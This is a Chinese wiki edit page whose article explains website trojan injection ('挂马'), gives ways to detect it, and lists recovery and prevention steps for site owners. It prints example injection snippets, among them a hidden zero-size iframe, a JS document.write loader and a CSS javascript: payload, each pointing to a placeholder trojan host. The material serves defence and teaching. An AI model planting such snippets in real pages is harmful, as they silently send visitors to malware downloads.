站长百科 | 数字化技能提升教程 数字化时代生存宝典
首页
数字化百科
电子书
建站程序
开发
服务器
办公软件
开发教程
服务器教程
软件使用教程
运营教程
热门电子书
WordPress教程
宝塔面板教程
CSS教程
Shopify教程
导航
程序频道
推广频道
网赚频道
人物频道
网站程序
网页制作
云计算
服务器
CMS
论坛
网店
虚拟主机
cPanel
网址导航
WIKI使用导航
WIKI首页
最新资讯
网站程序
站长人物
页面分类
使用帮助
编辑测试
创建条目
网站地图
站长百科导航
站长百科
主机侦探
IDCtalk云说
跨境电商导航
WordPress啦
站长专题
网站推广
网站程序
网站赚钱
虚拟主机
cPanel
网址导航专题
云计算
微博营销
虚拟主机管理系统
开放平台
WIKI程序与应用
美国十大主机
编辑“
挂马
”
人物百科
|
营销百科
|
网赚百科
|
站长工具
|
网站程序
|
域名主机
|
互联网公司
|
分类索引
跳转至:
导航
、
搜索
警告:
您没有登录。如果您做出任意编辑,您的IP地址将会公开可见。如果您
登录
或
创建
一个账户,您的编辑将归属于您的用户名,且将享受其他好处。
反垃圾检查。
不要
加入这个!
所谓的挂马,就是黑客通过各种手段,包括[[SQL]]注入,网站敏感文件扫描,[[服务器]]漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过[[数据库]] 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站[[FTP]],然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载[[木马]]病毒。 ==网页挂马的危害== 很多游戏网站被挂马,黑客目的就是盗取浏览该网站玩家的游戏账号,而那些大型网站被挂马,则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。 如果不小心进入了已被挂马的网站,则会感染木马病毒,以致丢失大量的宝贵文件资料和账号密码,其危害极大。 ==如何分辨自己的网站是否被挂马== 其实我们现在说的所谓的挂马一般就是在那些可编辑文件下或是头部加入一段代码来实现跳转到别的网站访问那个他们指定的HTML网页木马的然后通过你电脑本身的漏洞攻破你的系统给你下载一个下载者,然后那下载者设定多少时间后开始在指定地点隐藏下载木马并运行。所以说我们只要把那段代码给清理掉了就达到了清理挂马的作用了。所以我们首先要辨别是不是自己的站是不是被挂马。你如果打开网站发现很卡但是杀毒软件没报警别以为没事了,很多马很有可能做了免杀处理所以杀软没反映。我们打开网站点查看源代码如果顶部或是底下出现了这样的代码就恭喜你种标了。比如: <iframe src=http: //www.baidu/muma.html width=0 height=0></iframe> 插入一个长和高都是0框架运行,http: //www.baidu/muma.html这个页面。 但是因为框架的长和高都是零你就没办法看到那个窗口了。但是如果你没在顶部和底部发现这些代码就以为没事了,有的人还会在中间插入,只是在底部和顶部绝对不会影响到网站的整体结构不用想那么多。但是如果那个挂马的哥们稍微耐心一点多测试一下在网站代码的中间还是很容易的。所以如果你代码太多嫌找着麻烦的话你就可以直接在[[IE]]浏览器里点查看--隐私里看到底有没有外连到别的站上去的站。有的话那很有可能被挂马了。(如果你的站采集了的别人的图片的话在隐私里会有连到别人那的哦,或是统计代码也是,所以这要自己分析,哪些是正常的,哪些不是)!有的童鞋可能会说你这人真苯怎么不知道在源文件里直接查找<iframe这个呢。这样快多了,但是我想说的是不是所有人都是用插入框架的方法挂马的,方法可是有很多的哦,我就给大家列举一下比如: *js文件挂马 首先将以下代码 <pre>document.write("<iframe width='0' height='0' src='http //www.baidu/muma.htm'></iframe>"); </pre> 保存为xxx.js, 则JS挂马代码为 <pre><script language=javascript src=xxx.js></script> </pre> *css中挂马 <pre>body { background-image: url('javascript:document.write("<script src=http: //www.baidu/muma.js></script>")') } </pre> ==网站挂马的具体恢复措施及预防== '''恢复措施:''' #整站被挂马,最快速的恢复方法是,除开数据库、上传目录之外,替换掉其他所有文件; #仔细检查网站上传目录存放的文件,很多木马伪装成图片保存在上传目录,你直接把上传文件夹下载到本地,用缩略图的形式,查看是不是图片,如果不显示,则一律删除; #数据库里面存在木马,则把数据库的木马代码清除。可以采用查找替换; #如果网站源文件没有,则需要FTP下载网站文件,然后再DW里面,用替换清除的方式一个个清除,注意网站的木马数,如果被挂了很多不同的,必须多多检查 '''预防措施 :''' #建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。 #对[[asp]]上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的asp都要进行身份认证! #asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。 #到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。 #要尽量保持程序是最新版本。 #不要在网页上加注后台管理程序登陆页面的链接。 #为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。 #要时常备份数据库等重要文件。 #日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全! #一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。 #定期对网站进行安全的检测,具体可以利用网上一些工具,如亿思网站安全检测平台。 ==相关条目== *[[木马]] *[[病毒]] ==参考来源== *http://baike.baidu.com/view/368.htm [[category:网络术语|G]]
摘要:
请注意,您对站长百科的所有贡献都可能被其他贡献者编辑,修改或删除。如果您不希望您的文字被任意修改和再散布,请不要提交。
您同时也要向我们保证您所提交的内容是您自己所作,或得自一个不受版权保护或相似自由的来源(参阅
Wordpress-mediawiki:版权
的细节)。
未经许可,请勿提交受版权保护的作品!
取消
编辑帮助
(在新窗口中打开)